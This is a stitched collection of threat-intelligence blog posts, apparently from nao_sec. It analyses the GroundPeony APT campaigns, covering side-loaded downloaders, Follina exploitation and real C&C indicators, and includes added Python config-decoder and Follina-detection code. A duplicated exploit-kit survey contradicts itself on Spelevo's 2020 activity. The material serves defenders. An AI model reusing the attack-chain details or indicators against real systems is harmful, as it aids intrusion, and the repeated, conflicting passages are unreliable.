Wrap-Up GroundPeony is an APT group of which little is known so far. It is believed to be China-nexus. It is targeting East and South Asian countries like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. One point worth noting is their use of zero-day. Follina was exploited in its early period. This group also compromised legitimate websites and install malware. GroundPeony is an aggressive APT group. Please keep an eye on their future developments. IoC 103[.]199.17.184 160[.]20.145.111 172[.]93.189.239 *.onedrivo[.]com 1992b552bdaf93caeb470f94b4bf91e0157ba4a9bb92fb8430be946c0ddabdeb 425630cc8be2a7dc2626ccd927bb45e5d40c1cb606bb5b2a7e8928df010af7c9 fa6510a84929a0c49d91b3887189fca5a310129912d8e7d14fed062e9446af7e 142a027d78c7ab5b425c2b849b347952196b03618e4ad74452dbe2ed4e3f73cd d1989ca12426ed368816ce00f08975dc1ff1e4f474592523c40f9af344a57b49 6e13e5c7fcbafc47df259f2565efaed51bc1d021010c51673a7c455b5d4dad2b ef611e07e9d7e20ed3d215e4f407a7a7ca9f64308905c37e53df39f8a5bcbb3c 7b814e43af86a84b9ad16d47f9c74da484ea69903ef0fbe40ec62ba123d83a9a f3e0a3dd3d97ccc23c4cee0fd9c247dbe79fbf39bc9ae9152d4676c96e46e483 50182fca4c22c7dde7b8392ceb4c0fef67129f7dc386631e6db39dec73537705 References Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 &#8617; Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html &#8617;
<p><img src="https://nao-sec.org/assets/2023-08-22/top.png" alt="" /></p>
<p>This blog post is based on “GroundPeony: Crawling with Malice”, which we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present.</p>
<p><a href="https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/">https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/</a></p>
<p>Presentation material (PDF) is <a href="https://github.com/nao-sec/materials/blob/master/HITCON2023/GroundPeony_Crawling_with_Malice.pdf">here</a>.</p>
<h2 id="abstract">Abstract</h2>
<p>In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we first provide an overview of this attack campaign and then share the results of our analysis of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan.</p>
<p>As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption and trace it back to past attack campaigns. Past campaigns include attacks that exploited CVE-2022-30190, known as Follina, while it was still a zero-day. These studies help us understand the attackers’ motivations and background.</p>
<p>This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia, including Taiwan, that have not been reported so far, and to take concrete countermeasures.</p>
<h2 id="groundpeony">GroundPeony</h2>
<p>The name “GroundPeony” was created by us and is not generally known. Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC3347<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal.</p>
<p>There are two points to note about this group. First, GroundPeony exploits zero-day vulnerabilities. Specifically, it was the earliest group to exploit CVE-2022-30190, also known as Follina. Follina itself is not a very complex vulnerability, but it is speculated that this group can develop, or has access to, zero-days. This is very interesting. Second, GroundPeony compromises websites for malware distribution. In a past case, a Nepalese government website was compromised.</p>
<p>For these reasons, GroundPeony is considered to be an APT group with high attack skill and strong attack motivation.</p>
<h2 id="timeline">Timeline</h2>
<p>This is a quick look at GroundPeony’s attack timeline.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/timeline.png" alt="" /></p>
<p>The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know of ran from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries.</p>
<p>After that, we lost sight of them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we deal with the cases of April 2022 and March 2023.</p>
<h2 id="latest-attack-flow">Latest Attack Flow</h2>
<p>Let’s look at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/flow.png" alt="" /></p>
<p>The attack started with a spear-phishing email. The email has a DOC file attached. A URL is written in the DOC file, and a ZIP file is downloaded from that URL. The ZIP file contains an EXE file and a DLL file. Executing them infects the host with malware.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/mail.png" alt="" /></p>
<p>The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. The image has been mosaicked here, but the destination was a Taiwanese government organization. The source is a cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/doc.png" alt="" /></p>
<p>When the attached DOC file is opened, it looks like this. It pretends to show an error rather than something like a file name, and says to apply an update to resolve the error. A URL for downloading the update is written in the document. Trying to download the update file from this URL actually downloads a ZIP file containing malware.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/url.png" alt="" /></p>
<p>The URL used here is very strange. At first glance, it may look like a legitimate Microsoft website. But, because of how the URL is structured, the actual host is Cuttly.</p>
<p>Accessing this URL takes you to Cuttly, which then redirects to the ZIP file. At the time, the URL Cuttly redirected to was the website of a Taiwanese educational institution. This website had been compromised, and a ZIP file containing malware had been placed on it.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/zip.png" alt="" /></p>
<p>The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like the Windows Recycle Bin. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware.</p>
<p>By the way, did you notice that the update numbers written in the DOC file and the ZIP file are different? We don’t know whether this was simply a mistake by the attacker or a remnant of another ongoing attack campaign.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/kb.png" alt="" /></p>
<h2 id="malware-analysis">Malware Analysis</h2>
<p>Let’s take a look at how the malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe, but their behavior is the same.</p>
<p>When the EXE file is executed, the 4 files placed in $RECYCLE.BIN are copied to the mic directory under the ProgramData directory. At this time, the 4 files are also renamed, to mic.exe, version.dll, mic.doc and mic.ver. Then, mic.exe is executed.</p>
<p>mic.exe is a legitimate file with a digital signature, but it loads the version.dll that exists in the same directory. When version.dll is executed by DLL side-loading, it loads and decrypts mic.doc. The decryption result is malware we call “micDown”.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/micdown.png" alt="" /></p>
<ol> <li>mic.exe <ul> <li>Legitimate EXE file with a digital signature</li> </ul> </li> <li>version.dll <ul> <li>DLL for side-loading</li> <li>Shellcode launcher for mic.doc</li> </ul> </li> <li>mic.doc <ul> <li>Shellcode downloader (micDown)</li> </ul> </li> <li>mic.ver <ul> <li>Config file for micDown</li> </ul> </li> </ol>
<p>The decoding performed by version.dll proceeds in two steps. First, version.dll decodes mic.doc and executes it as shellcode. The shellcode then further decodes itself and continues execution.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/versiondll.png" alt="" /></p>
<p>The export function of version.dll is very simple. First, it reads mic.doc into a memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor and add instructions. 
When decoding is complete, control is transferred to the memory area where the decoded shellcode is located.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/dll1.png" alt="" /></p>
<p><img src="https://nao-sec.org/assets/2023-08-22/dll2.png" alt="" /></p>
<p>The decoded shellcode uses the same custom XOR algorithm as before. RtlDecompressBuffer is then used to decompress the result. The shellcode is decoded from the beginning of the file, excluding the jump instruction.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/doc1.png" alt="" /></p>
<p><img src="https://nao-sec.org/assets/2023-08-22/doc2.png" alt="" /></p>
<p>The decoded code executes an executable whose MZ header has been removed. It also decodes the data in mic.ver and uses it as its configuration. Finally, it downloads shellcode from the C&amp;C server saved in the config and executes it.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/payload1.png" alt="" /></p>
<p><img src="https://nao-sec.org/assets/2023-08-22/payload2.png" alt="" /></p>
<p>The downloaded shellcode is encoded with an algorithm similar to that used for the previous file. It differs slightly from the file encoding algorithm in that the order of the add, sub and xor instructions is swapped.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/payload3.png" alt="" /></p>
<p><img src="https://nao-sec.org/assets/2023-08-22/payload4.png" alt="" /></p>
<p><img src="https://nao-sec.org/assets/2023-08-22/payload5.png" alt="" /></p>
<p>The encoded config consists of a 0x40-byte C&amp;C host area and a 0x2-byte port area. The IP address at this time was 103[.]199.17.184.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/ver1.png" alt="" /></p>
<p><img src="https://nao-sec.org/assets/2023-08-22/ver2.png" alt="" /></p>
<h2 id="related-file">Related File</h2>
<p>An attack similar to the Taiwanese attack described above was also carried out in Nepal. Although the specific origin of the attack is unknown, a legitimate website was compromised and a ZIP file was placed on it, as was the case in Taiwan.</p>
<p>The legitimate website that was compromised was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. It is unclear what this has to do with the attack campaign.</p>
<p>In the attack against Nepal, app.onedrivo[.]com was used as the C&amp;C server. The domain was registered through PublicDomainRegistry. More on this domain later.</p>
<p>In the attack against Nepal, the malware behaves in the same way. When the EXE file is executed, it copies and renames the files and executes mic.exe. mic.exe side-loads version.dll. Then version.dll reads, decodes and executes mic.doc. The malware executed was the same as before, micDown.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/flow2.png" alt="" /></p>
<h2 id="related-past-campaign">Related Past Campaign</h2>
<p>The C&amp;C server used in the attack on Nepal described above has also been used in other attacks in the past. This past attack on Nepal occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina. Finally, a CobaltStrike beacon is executed. This domain was used both as the server from which CobaltStrike was downloaded and as its C&amp;C server.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/past.png" alt="" /></p>
<p>The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know whether this accusation is authentic.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/decoy.png" alt="" /></p>
<p>This DOCX file contains external link settings, which load an HTML file. The HTML file contains JavaScript code that changes the location. The new location is written with the ms-msdt scheme, the scheme for the Microsoft Support Diagnostic Tool. However, a bug existed in it that allowed PowerShell code to be executed. As a result, PowerShell code can be executed from a DOCX file.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/xml.png" alt="" /></p>
<p>The PowerShell code downloads a CAB file from the server, extracts it, and executes its contents.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/ps1.png" alt="" /></p>
<p>Inside the CAB file is an EXE file made with PyInstaller. This EXE is a downloader. It downloads a CobaltStrike beacon from onedrivo[.]com and runs it.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/pyi.png" alt="" /></p>
<h2 id="attribution">Attribution</h2>
<p>Let us consider the attribution of this group. To begin with, it is important to establish when this group was exploiting Follina. Follina was eventually exploited by a very large number of APT groups, but that was after the details were made public. Here is the timeline.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/follina.png" alt="" /></p>
<p>The first time Follina became known to the public was through our tweets. We discovered the Follina sample used against Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released.</p>
<p>Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. However, Microsoft did not acknowledge it as a vulnerability at that time. The attack reported was also against Belarus.</p>
<p>Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India. We believe these are the earliest Follina samples. And these are the attacks by the group Mandiant calls UNC3347, which we call GroundPeony.</p>
<p>In other words, GroundPeony was exploiting Follina during a perfect zero-day period. Various organizations have written reports about Follina exploits, but China-nexus groups are the only ones that exploited Follina during the zero-day period. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access.</p>
<p>Let’s look at another indicator. We analyzed the EXE file made with PyInstaller that is executed after the Follina exploit. The Python code can easily be decompiled from a PyInstaller binary. The extracted file looked like this.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/python.png" alt="" /></p>
<p>A large number of Chinese comments were written in it. The code was copy-pasted from various public repositories, but most of it was written by Chinese developers. This is a very elementary mistake. Even so, it is highly likely that the person who created the malware is a native Chinese speaker.</p>
<p>We tried mapping the victims (or presumed victims). It is a very interesting diagram. What does this mean?</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/map.png" alt="" /></p>
<p>Based on our research so far, we have created a diamond model.</p>
<p><img src="https://nao-sec.org/assets/2023-08-22/diamond.png" alt="" /></p>
<p>GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia, for example Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms.</p>
<p>The attacks begin with spear-phishing emails. They compromise legitimate websites and use them for their attacks. There was nothing unique about the IP addresses used, and no connection to the victim countries could be found. GroundPeony also has zero-day access. Besides popular tools such as CobaltStrike, they also use the group’s own malware.</p>
<h2 id="wrap-up">Wrap-Up</h2>
<p>GroundPeony is an APT group of which little is known so far. It is believed to be China-nexus. 
It is targeting East and South Asian countries like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms.</p>
<p>One point worth noting is their use of zero-days. Follina was exploited in its early period. This group also compromised legitimate websites and installed malware on them. GroundPeony is an aggressive APT group. Please keep an eye on their future developments.</p>
<h2 id="ioc">IoC</h2>
<h2 id="references">References</h2>
<div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div>
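As an added example (not nao_sec's code and not taken from the sample), here is a parser for a mic.ver-style configuration in the layout the Malware Analysis section describes: a 0x40-byte C&C host area followed by a 0x2-byte port area, recovered through a byte-wise sub/xor/add transform whose operation order differs between the file decoder in version.dll and the downloaded shellcode. The key byte, the add/sub operand and the little-endian port order are assumptions, since the post does not give them; the encoded blob is constructed.

```python
import struct

HOST_LEN = 0x40      # C&C host area, as described in the post
PORT_LEN = 0x2       # port area, as described in the post
CONFIG_LEN = HOST_LEN + PORT_LEN

# Placeholder constants: the post does not give the real key material,
# so these are assumed values for the demonstration only.
XOR_KEY = 0x5A
ADD_CONST = 0x13


def decode_bytes(data: bytes, order: str = "sub-xor-add") -> bytes:
    """Byte-wise sub/xor/add transform (mod 256), applied in the given order.

    "sub-xor-add" mirrors the order the post describes for the file decoder in
    version.dll; "add-sub-xor" mirrors the swapped order it describes for the
    shellcode downloaded from the C&C server. Operands are the assumed
    constants above.
    """
    ops = {
        "sub": lambda b: (b - ADD_CONST) & 0xFF,
        "add": lambda b: (b + ADD_CONST) & 0xFF,
        "xor": lambda b: b ^ XOR_KEY,
    }
    steps = order.split("-")
    out = bytearray()
    for b in data:
        for step in steps:
            b = ops[step](b)
        out.append(b)
    return bytes(out)


def encode_bytes(data: bytes, order: str = "sub-xor-add") -> bytes:
    """Inverse of decode_bytes for the same order: the inverse of each step,
    applied in reverse order. Used here only to build constructed samples."""
    inverse = {"sub": "add", "add": "sub", "xor": "xor"}
    steps = [inverse[s] for s in reversed(order.split("-"))]
    return decode_bytes(data, "-".join(steps))


def parse_config(blob: bytes) -> dict:
    """Split a decoded mic.ver blob into host and port.

    Layout from the post: 0x40 bytes of host (NUL-padded) then 0x2 bytes of
    port. Little-endian port order is an assumption; confirm it against the
    sample before relying on it.
    """
    if len(blob) < CONFIG_LEN:
        raise ValueError(f"config too short: {len(blob)} < {CONFIG_LEN} bytes")
    host = blob[:HOST_LEN].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    (port,) = struct.unpack("<H", blob[HOST_LEN:CONFIG_LEN])
    return {"host": host, "port": port}


def decode_mic_ver(encoded: bytes) -> dict:
    """Decode an encoded mic.ver blob with the file-decoder order and parse it."""
    return parse_config(decode_bytes(encoded, "sub-xor-add"))


def defang(host: str) -> str:
    """Render a host so it cannot be clicked in a report (e.g. 192[.]0[.]2[.]1)."""
    return host.replace(".", "[.]")


def build_sample_config(host: str, port: int) -> bytes:
    """Construct an encoded mic.ver-style blob for testing (not a real sample)."""
    raw = host.encode("ascii")
    if len(raw) > HOST_LEN:
        raise ValueError("host does not fit the 0x40-byte host area")
    host_area = raw.ljust(HOST_LEN, b"\x00")
    return encode_bytes(host_area + struct.pack("<H", port), "sub-xor-add")


if __name__ == "__main__":
    # Constructed input; the host is a reserved test name, not the real C&C.
    sample = build_sample_config("c2.example.invalid", 443)
    cfg = decode_mic_ver(sample)
    print(f"C&C: {defang(cfg['host'])}:{cfg['port']}")  # C&C: c2[.]example[.]invalid:443
```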
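The Related Past Campaign section describes the Follina chain: a DOCX whose external link settings load an HTML file, whose script then changes the location to an ms-msdt: URI. As an added example (not nao_sec's code), the following scanner checks a DOCX's relationship parts for that shape and checks a fetched HTML stage for an ms-msdt: location rewrite, without ever opening the document in Word; the sample DOCX and HTML are constructed, and the relationship type URI is the standard OOXML oleObject type.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
REL_TAG = f"{{{REL_NS}}}Relationship"

# The scheme the post describes: ms-msdt, handled by the Microsoft Support Diagnostic Tool.
MSDT_RE = re.compile(r"^\s*ms-msdt:", re.IGNORECASE)
# Script that rewrites the page location, as in the HTML stage described in the post.
LOCATION_RE = re.compile(
    r"(?:window\.)?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)


def external_relationships(docx_bytes: bytes) -> list:
    """Return every TargetMode="External" relationship found in any .rels part.

    Only the ZIP container and its relationship XML are read; the document is
    never rendered, so this is safe to run on untrusted files.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed part carries no relationships
            for rel in root.iter(REL_TAG):
                if (rel.get("TargetMode") or "").lower() != "external":
                    continue
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": (rel.get("Type") or "").rsplit("/", 1)[-1],
                    "target": rel.get("Target") or "",
                })
    return findings


def assess_docx(docx_bytes: bytes) -> dict:
    """Flag the Follina-style shape: an external oleObject relationship that
    fetches a remote HTML resource, or a relationship targeting ms-msdt: directly."""
    rels = external_relationships(docx_bytes)
    ole_remote = [r for r in rels
                  if r["type"] == "oleObject"
                  and r["target"].lower().startswith(("http://", "https://"))]
    msdt_direct = [r for r in rels if MSDT_RE.match(r["target"])]
    verdict = "suspicious" if ole_remote or msdt_direct else "clean"
    return {"verdict": verdict, "external": rels,
            "ole_remote": ole_remote, "msdt_direct": msdt_direct}


def msdt_redirects(html: str) -> list:
    """Second stage: given the fetched HTML as a string (nothing is downloaded
    here), return every location target that uses the ms-msdt: scheme."""
    return [t for t in LOCATION_RE.findall(html) if MSDT_RE.match(t)]


def make_sample_docx(target: str, external: bool = True) -> bytes:
    """Build a minimal, constructed DOCX with one oleObject relationship in
    word/_rels/document.xml.rels pointing at `target` (test input only)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_TYPE}" Target="{target}"{mode}/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure: the relationship points at an attacker-controlled HTML page.
    lure = make_sample_docx("http://lure.example.invalid/stage.html")
    print(assess_docx(lure)["verdict"])  # suspicious
    # Constructed benign document: an embedded (internal) OLE object only.
    benign = make_sample_docx("embeddings/oleObject1.bin", external=False)
    print(assess_docx(benign)["verdict"])  # clean
```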
  56. Exploit Kit still sharpens a sword

    Thu, 15 Apr 2021 15:00:00 -0000

    Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post.

    Exploit Kit Landscape

    As of April 2021, the following 6 types of Exploit Kits have been observed to be active.

      RIG
      Spelevo
      PurpleFox
      Underminer
      Bottle
      Magnitude

    nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data it has observed is as follows. Some Exploit Kits are not counted because they are observed in different environments.

    The features of the 6 types of Exploit Kits currently observed are as follows.

      Exploit Kit   Private   Update   Exploit
      RIG           No        Yes      CVE-2020-0674, CVE-2021-26411
      Spelevo       No        No       CVE-2018-8174, CVE-2018-15982
      PurpleFox     Yes       Yes      CVE-2021-26411
      Underminer    Yes       No       CVE-2018-15982
      Bottle        Yes       Yes      CVE-2020-1380, CVE-2021-26411
      Magnitude     Yes       Yes      CVE-2021-26411

    Here is sample traffic for each.

    RIG Exploit Kit

    RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021. RIG started abusing CVE-2021-26411 in April 2021 and is still incorporating changes. Landing pages are no longer obfuscated as they used to be; the code is very simple. The malware is RC4 encrypted. Download sample traffic here.

    Spelevo Exploit Kit

    Spelevo is an Exploit Kit that appeared in 2019. It was very mature in 2020, and in 2021 it is one of the most active Exploit Kits. Spelevo hasn’t changed for a long time. Spelevo hides the malware in an image. See this article[2] for its detailed behavior. Download sample traffic here.

    PurpleFox Exploit Kit

    PurpleFox is an Exploit Kit that has been active since 2019. It is a private exploit kit for delivering the PurpleFox malware. It is enthusiastic about exploits and is fairly fast at incorporating new vulnerabilities. PurpleFox started to exploit CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time. Download sample traffic here.

    Underminer Exploit Kit

    Underminer is an Exploit Kit that appeared in 2018. It is a pretty distinctive Exploit Kit and is known to be extremely difficult to analyze. It is used to deliver its own malware, called Hidden Bee. See this article[3] for more details. Underminer has a cycle of activity for several months followed by silence for several months. It had been silent since November 2020, but was revived in April 2021. But its essence hasn’t changed at all. Download sample traffic here.

    Bottle Exploit Kit

    Bottle is an Exploit Kit that appeared in 2019. It is an extremely rare Exploit Kit that targets only Japan. It is used to deliver its own malware, called Cinobi. It is one of the most active Exploit Kits in Japan. It had not been observed since November 2020, but it was revived in April 2021. It is also worth noting that, unlike other Exploit Kits, it exploits CVE-2020-1380 and CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details. Download sample traffic here.

    Magnitude Exploit Kit

    Magnitude is one of the oldest existing Exploit Kits. It has been observed only in certain countries/regions such as South Korea and Taiwan, and the details have not been reported much. Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving.

    One more: #MagnitudeEK pic.twitter.com/pOuIZzAPZG - Jérôme Segura (@jeromesegura) April 14, 2021

    Finally

    Drive-by Download attacks are still observed in 2021. They have nothing to do with most people. As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks continue to exist alongside Internet Explorer.

    References

    [1] https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf
    [2] https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit
    [3] https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/
    [4] http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf
    <p>Note: This blog post doesn’t make sense to many</p> <p>It’s 2021 now. Moreover, the first quarter has already passed. I thought Drive-by Download attacks were dead four years ago. Angler Exploit Kit has disappeared, the pseudo-Darkleech and EITest campaigns have disappeared, and RIG Exploit Kit has also declined. At that time, Drive-by Download attacks were definitely supposed to die. However, even in 2021 they have not disappeared; the fire is still smouldering.</p> <p>In April 2021, I received some incredible notices, for example the following.</p> <ul> <li>PurpleFox Exploit Kit has started exploiting CVE-2021-26411</li> <li>RIG Exploit Kit has started exploiting CVE-2021-26411</li> <li>Bottle Exploit Kit is back, and has started exploiting CVE-2020-1380 and CVE-2021-26411</li> <li>Underminer Exploit Kit is back</li> </ul> <p>To repeat: it’s 2021 now, not 2017. Internet Explorer’s share was taken away by Chrome and Edge, and Drive-by Download attacks were supposed to die. Why are there still Drive-by Download attacks? Here are some reasons, including the opinions of my friends.</p> <ol> <li>Internet Explorer is still used in some countries/regions, including Japan</li> <li>Due to the influence of the coronavirus, remote work has increased, and the number of users with network security vulnerabilities has increased</li> <li>Internet Explorer vulnerabilities are still being discovered and exploit code is still being published</li> </ol> <p>In reality, these are intricately intertwined, and there may be other reasons.</p> <p>In any case, Drive-by Download attacks are still being observed. Moreover, they are a little more active. This is irrelevant for most people, because most people don’t use Internet Explorer. If you don’t use Internet Explorer, a typical Exploit Kit attack is not a threat. A small number of targeted attacks may use a Chrome 0day, which is not discussed here.</p> <p>For the few enthusiastic Internet Explorer users that exist, I write this blog post. 
In other words, I will introduce the characteristics of the common Drive-by Download attacks that you may encounter as of April 2021. Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post.</p> <h2 id="exploit-kit-landscape">Exploit Kit Landscape</h2> <p>As of April 2021, the following 6 types of Exploit Kits have been observed to be active.</p> <ul> <li>RIG</li> <li>Spelevo</li> <li>PurpleFox</li> <li>Underminer</li> <li>Bottle</li> <li>Magnitude</li> </ul> <p>nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data observed by it is as follows. Some Exploit Kits are not counted because they are observed in different environments.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/ek.png" alt="" /></p> <p>The features of the 6 types of Exploit Kits currently observed are as follows: whether the kit is private (used by a single actor rather than rented out), whether it has been updated recently, and which vulnerabilities it exploits.</p> <table> <thead> <tr> <th> </th> <th>Private</th> <th>Update</th> <th>Exploit</th> </tr> </thead> <tbody> <tr> <td>RIG</td> <td>No</td> <td>Yes</td> <td>CVE-2020-0674, CVE-2021-26411</td> </tr> <tr> <td>Spelevo</td> <td>No</td> <td>No</td> <td>CVE-2018-8174, CVE-2018-15982</td> </tr> <tr> <td>PurpleFox</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> <tr> <td>Underminer</td> <td>Yes</td> <td>No</td> <td>CVE-2018-15982</td> </tr> <tr> <td>Bottle</td> <td>Yes</td> <td>Yes</td> <td>CVE-2020-1380, CVE-2021-26411</td> </tr> <tr> <td>Magnitude</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> </tbody> </table> <p>Here is sample traffic for each.</p> <h3 id="rig-exploit-kit">RIG Exploit Kit</h3> <p>RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021.</p> <p>RIG started abusing CVE-2021-26411 in April 2021 and is still incorporating changes. Landing Pages are not obfuscated as they used to be. 
The code is very simple. The malware is RC4 encrypted.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/rig.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/rig.saz">here</a>.</p> <h3 id="spelevo-exploit-kit">Spelevo Exploit Kit</h3> <p>Spelevo is an Exploit Kit that appeared in 2019. It was quiet in 2020, but in 2021 it is one of the most active Exploit Kits.</p> <p>Spelevo hasn’t changed for a long time. Spelevo hides the malware in an image. See this article[2] for detailed behavior.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/spelevo.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/spelevo.saz">here</a>.</p> <h3 id="purplefox-exploit-kit">PurpleFox Exploit Kit</h3> <p>PurpleFox is an Exploit Kit that has been active since 2019. It is a private exploit kit used to deliver PurpleFox malware. It is enthusiastic about exploits and is fairly fast at incorporating new vulnerabilities.</p> <p>PurpleFox started to exploit CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/purplefox.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/purplefox.saz">here</a>.</p> <h3 id="underminer-exploit-kit">Underminer Exploit Kit</h3> <p>Underminer is an Exploit Kit that appeared in 2018. It is a pretty distinctive Exploit Kit and is known to be extremely difficult to analyze. It is used to deliver its own malware, called Hidden Bee. See this article[3] for more details.</p> <p>Underminer has a cycle of activity for several months and then silence for several months. It had been silent since November 2020, but was revived in April 2021. 
